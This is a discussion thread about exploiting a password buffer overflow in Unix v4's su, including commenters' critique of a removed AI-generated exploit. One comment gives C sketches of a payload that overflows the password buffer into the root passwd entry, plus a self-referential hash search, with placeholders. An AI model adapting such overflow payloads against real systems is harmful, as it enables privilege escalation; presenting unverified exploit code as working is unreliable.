Comment by b-kuiper
2 days ago
So, has somebody already written the exploit for it? Are there any special things to consider when exploiting such an architecture from back in the day, or do the same basic principles apply?
Yeah, somebody came up with one here: https://news.ycombinator.com/item?id=46469897
EDIT: removed due to low effort and markup issues. Thank you all for your feedback.
Perhaps the downvoters can tell me why they are downvoting? I'm curious to hear whether this would work on Unix v4 or whether there are special things to consider. I thought I would ask Claude for a basic example so people could perhaps provide feedback. I guess people consider it a low-effort reply? Anyway, thanks for your input.
Your response is a non-sequitur that does not answer the question you yourself posed, and you are responding to yourself with a chatbot. Given that it is a non-sequitur, presumably no work was done to verify whether the LLM's output was hallucinated, so it is probably also wrong in some way. LLMs are token predictors, not fact databases; the idea that one would be reproducing a “historical exploit” is nonsensical. Do you believe what it says because it says so in a code comment? Please remember what LLMs are actually doing and set your expectations accordingly.
More generally, people don’t participate in communities to have conversations with someone else’s chatbot, and especially not to be made to vicariously read someone else’s conversation with their own chatbot.
The explanation it gives at the start appears to be on the right track, but the post then has two separate incomplete/flawed attempts at coding it. (The first one doesn't actually put the expected crypt() output in the payload, and the second one puts null bytes in the password section of the payload, where they can't go.)
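For what it's worth, a payload generator that at least gets the layout right would look something like this minimal sketch. The 100-byte space filler, the passwd field layout, and the `FAKE_HASH` placeholder are all assumptions on my part; computing the real hash runs into the self-referential problem discussed further down the thread:

```c
#include <stdio.h>
#include <string.h>

/* Placeholder -- the real value has to be the crypt() output of the
 * entire typed line, which is exactly what both posted attempts missed. */
#define FAKE_HASH "XXXXXXXX"

int main(void)
{
    char payload[256];

    /* 100 filler bytes fill password[100]; everything after them
     * spills into the adjacent pwbuf[100] holding root's passwd entry. */
    memset(payload, ' ', 100);
    payload[100] = '\0';

    /* Overwrite the start of pwbuf with a fake entry whose hash field
     * is FAKE_HASH; the trailing ':' terminates the field where su
     * expects it. No '\0' bytes anywhere, and '\n' ends su's read loop. */
    strcat(payload, "root:" FAKE_HASH ":\n");

    fputs(payload, stdout);   /* pipe this into su */
    return 0;
}
```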
> Perhaps the downvoters can tell me why they are downvoting?
Not one of the actual downvoters, but:
Lack of proper indenting means your code as posted doesn't even compile; e.g. I presume there was a `char* p;` that had its `*` stripped as markdown.
Untested AI slop code is gross. You've got two snippets doing more or less the same thing in two different styles...
First one hand-copies strings character by character, and has an incoherent explanation of what `pwbuf` actually is (the comment says "root::", the code actually has "root:k.:\n", and neither an empty hash nor "k." is likely to be the hash that actually matches a password of 100 spaces plus `pwbuf` itself, which is presumably what `crypt(password)` would end up hashing).
Second one is a little less gross, but the hardcoded `known_hash` is again almost certainly incorrect... and even if by some miracle it were accurate, the random Unicode embedded in it would make the source file's encoding critical to compiling as intended. Worse, the `\0`s written to `*p` mean su.c would hit the `return;` in its read loop before even attempting to check the hash, assuming you're piping the output of these programs to su:
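(The code quote didn't survive the copy; from memory, the read loop in the early su.c is roughly the following — a paraphrase, not a verbatim quote:)

```c
	printf("password: ");
	p = password;
	while ((*p = getchar()) != '\n')
		if (*p++ == '\0')   /* a NUL byte in the input (or EOF, which the
		                       early getchar() also returned as 0) bails
		                       out before the hash is ever compared */
			return;
	*p = '\0';
	p = crypt(password);
```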
A preferable alternative to random, nonsensical, system-specific hardcoded hashes would be to simply call `crypt` yourself, although you might need a brute-force loop: the overflowing `password` that the original passes to `crypt(password);` would include the spilled `pwbuf` contents, and thus the hash itself, self-referentially. That gets messy...
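Concretely, the messy part is a fixed-point search: you need a hash H such that hashing the 100 filler bytes plus `"root:" + H + ":"` yields H again. A sketch of what that might look like, where `v4crypt` is a hypothetical stand-in for a faithful reimplementation of the V4-era crypt (modern crypt(3) is a different algorithm entirely), and the 8-character hash length is assumed:

```c
#include <stdio.h>
#include <string.h>

/* Hypothetical stand-in for a reimplementation of the V4-era crypt();
 * modern crypt(3) will not produce compatible hashes. */
extern char *v4crypt(const char *pw);

int main(void)
{
    char guess[16] = "aaaaaaaa";   /* starting candidate; 8-char hash assumed */
    char typed[256];

    for (;;) {
        /* Rebuild what su would actually pass to crypt(): the 100
         * filler bytes plus the fake entry containing the guess. */
        memset(typed, ' ', 100);
        typed[100] = '\0';
        strcat(typed, "root:");
        strcat(typed, guess);
        strcat(typed, ":");

        char *h = v4crypt(typed);
        if (strcmp(h, guess) == 0)
            break;                 /* fixed point: the hash hashes to itself */

        /* Feed the output back in as the next guess and retry. */
        strncpy(guess, h, sizeof(guess) - 1);
        guess[sizeof(guess) - 1] = '\0';
    }
    printf("%s\n", guess);         /* the hash to embed in the payload */
    return 0;
}
```

Note that feeding the output back in isn't guaranteed to converge — it can just cycle — so a real attempt might need randomized candidates, and a fixed point may not even exist for a given prefix. Hence "messy".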